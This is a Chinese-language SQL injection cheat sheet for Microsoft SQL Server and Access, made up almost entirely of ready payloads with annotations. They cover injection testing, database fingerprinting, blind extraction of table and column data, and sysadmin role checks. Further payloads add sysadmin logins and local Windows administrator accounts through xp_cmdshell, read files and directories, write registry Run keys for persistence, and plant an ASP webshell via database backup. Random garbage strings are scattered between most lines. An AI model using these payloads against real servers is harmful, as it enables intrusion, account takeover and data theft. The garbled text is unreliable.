1.判断是否有注入(布尔型测试): ;and 1=1 页面正常、;and 1=2 页面异常或为空,说明参数被原样拼入了 SQL。前缀 ; 适用于数字型参数,字符型参数的闭合方式见第 3 条。
2.初步判断是否是mssql: ;and user>0 。user 是 nvarchar 类型,与整数比较时 MSSQL 会抛出类型转换错误,并在错误信息中带出当前数据库用户名。此方法依赖应用把数据库错误原样返回给客户端;若错误被屏蔽,需改用布尔/时间盲注。
YqgW8EM
3.注入参数是字符型: 'and [查询条件] and ''=' (开头的单引号闭合原 SQL 中的字符串,结尾的 ''=' 与原语句剩余的引号拼成 ''='' 以保持语法成立)
R`q!~8u
4.搜索(LIKE)时没过滤参数的: 'and [查询条件] and '%25'=' (%25 是 URL 编码后的 %,用于闭合原查询中 like '%...%' 的通配符)
\`ReZu$
5.判断数据库系统(通过各自特有的系统表)
=6&D4~R
;and (select count(*) from sysobjects)>0 为真则是 mssql (sysobjects 是兼容视图,新版本可改用 sys.objects)
LS'=>s"
;and (select count(*) from msysobjects)>0 为真则是 access (Access 默认通常不允许读取 MSysObjects,此时返回的是权限错误而非逻辑假,同样可作为 Access 的特征)
,-b %X
'9@R=#nd
"[yiNJ"kt
vuBA&j0C
6.猜表名 ;and (select Count(*) from [表名])>0 (注:原文此处及下文的“数据库名”占位符实际指表名)
8BDL{?Mu
7.猜字段 ;and (select Count(字段名) from 表名)>0
WKsx|a]U
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0 (top 1 不带 order by 时返回哪一行并不确定,猜解多行数据时应加 order by 或 where 限定)
Sj?sw]3
9.(1)猜字段的ascii值(access) tpONSRY
<>s\tJ
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
lvi:I+VgA
(2)猜字段的ascii值(mssql) JB@VP{
W?-BT >#s
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 (逐位猜解时把 >0 换成 >64、>96 等做二分比较可大幅减少请求数)
u(702S4
10.测试权限结构(mssql) — IS_SRVROLEMEMBER 返回 1(是成员)/0(不是成员)/NULL(角色名或登录名无效),因此 1=(select ...) 为真即当前登录属于该服务器角色。以下 payload 以 ; 开头、-- 结尾,依赖 MSSQL 支持堆叠查询和行注释。
Z;D3lbqE
uW=NH;u
"~C#DZwt{
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- (sysadmin 为真时,后续 xp_cmdshell、xp_reg*、backup 等手法才可用)
vWs c{9
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- j*d~h$[k
^~ $&
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- -FV'%X$i
X>7]g670@
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \*aLyyy3
<|3v@
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
@l Gn G
XWpnZFjE
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ^1=|(Z/
GK?R76d
;and 1=(select IS_MEMBER('db_owner'));-- (IS_MEMBER 判断的是当前数据库角色,不是服务器角色)
+z0}{,HX
4uAafQ`@H
"B3:m-'
11.添加mssql和系统的帐户 (以下操作需要 sysadmin 权限。sp_addlogin/sp_password/sp_addsrvrolemember 自 SQL Server 2005 起已弃用,新版本应使用 CREATE LOGIN / ALTER LOGIN / ALTER SERVER ROLE ... ADD MEMBER;xp_cmdshell 自 2005 起默认关闭,需先 exec sp_configure 'xp_cmdshell',1; reconfigure;操作系统命令以 SQL Server 服务账户身份执行,该账户不是本地管理员时 net user /add 和 net localgroup administrators 会失败)
Ba|}C(Ws?
;exec master.dbo.sp_addlogin username;-- (创建登录名,密码为空;等价于 CREATE LOGIN username WITH PASSWORD='password')
;exec master.dbo.sp_password null,password,username;-- (参数顺序为 旧密码,新密码,登录名;原文写成 null,username,password 会把登录名和密码弄反)
sA-W^*+
;exec master.dbo.sp_addsrvrolemember username,sysadmin;-- (参数顺序为 登录名,角色名,且需用逗号分隔;原文 sysadmin username 既缺逗号又颠倒了顺序)
2 _n*u^X:_
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- (各开关之间需要空格,整条命令在同一行)
rq["O/2
;exec master.dbo.xp_cmdshell 'net user username password /add';--
iLcadX
{))S<_yN
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- (把新用户加入本地管理员组,要求 SQL Server 服务账户本身具有管理员权限)
UQ])QTrZFi
zB"
`i
Juqn
X
12.(1)遍历目录 (xp_dirtree 返回 subdirectory、depth 两列,与 dirs(paths, id) 一一对应;随后把 varchar 列与 0 比较触发类型转换错误,目录名随错误信息回显,同样依赖错误回显;用完应 drop table dirs 清理痕迹)
}, &,Dt
;create table dirs(paths varchar(100), id int) vx}Z
Gj8[*3d
;insert dirs exec master.dbo.xp_dirtree 'c:\'
|#:dC #
;and (select top 1 paths from dirs)>0
ZHECcPhz
J?quYlS
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0 (原文结尾的 >) 是笔误,应为 >0;每取到一个目录名就追加到 not in 列表里继续取下一个)
&d3 '{~:
I@Z*Nu1L
U4l*;od
(2)遍历目录 (以下 xp_* 扩展存储过程默认仅 sysadmin 可执行;temp 表的列数需与各存储过程返回结果集的列数一致,否则 insert ... exec 会报错)
Bi:wP/>v
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器(返回 4 列,正好填满 temp 表)
kJi&9
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表(单列)
{-N90Oe
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构(两列: 目录名、深度)
2vdQ&H4
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容(以 SQL Server 服务账户权限读取,输出按行逐条插入 id 列)
) v5n "W
7h9[-d6
R|J>8AL}BY
13.mssql中的存储过程 (注册表类扩展存储过程 xp_reg* 默认仅 sysadmin 可执行;向 HKLM\...\CurrentVersion\Run 写入的值会在用户登录时执行,是典型的持久化手法,测试后应删除)
ro^6:w3O^
xp_regenumvalues 注册表根键, 子键
%iL@:'?K
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回该子键下所有值
\.;ct
xp_regread 根键,子键,键值名
G<-9U}~76
yX.5Y|A<
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键值的数据
q\'P1~
xp_regwrite 根键,子键, 值名, 值类型, 值
C:GHP$/}
常用的值类型有 2 种: REG_SZ 表示字符串型, REG_DWORD 表示整型
z5&%T}$tJ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
j)tCr Py
xp_regdeletevalue 根键,子键,值名
%
X]pWvQ Q]
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
UG"6RW @
xp_regdeletekey 根键,子键  例: ;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
:7Z\3_D/
R(?<97
Ns|V7|n]
14.mssql的backup创建webshell (需要对 model 库执行 BACKUP DATABASE 的权限,通常即 sysadmin/db_owner;备份文件由 SQL Server 服务账户写入,目标目录需对该账户可写且位于 Web 根目录下;生成的文件前后夹杂备份格式的二进制数据,能生效是因为 ASP 解析器忽略 <% %> 之外的内容;在 model 库建的表会被之后新建的所有数据库继承,测试后务必 drop table cmd)
2VV[*QI
use model
B==a
create table cmd(str image);
g"!#]LLe
insert into cmd(str) values ('');  -- 单引号内填入 ASP 脚本内容,本文未给出具体代码
[[?[? V ,
backup database model to disk='c:\l.asp';
>wQwf
ICl_ eb
o(d_uJOB
zJuRth)(,
15.mssql内置函数 (以下两条同样通过类型转换错误回显信息,依赖应用返回数据库错误)
'/u:,ar
;and (select @@version)>0 在转换错误中带出 SQL Server 版本字符串(其中包含所运行的 Windows 版本信息),并非单纯的 Windows 版本号
3:~l2KIP4
;and user_name()='dbo' 判断当前连接在当前数据库中是否映射为 dbo(数据库所有者)。sa 及 sysadmin 成员都会映射为 dbo,但 dbo 并不一定就是 sa;要取登录名可用 system_user,要确认 sysadmin 应使用第 10 条的 IS_SRVROLEMEMBER('sysadmin')
3 $$5Mk(&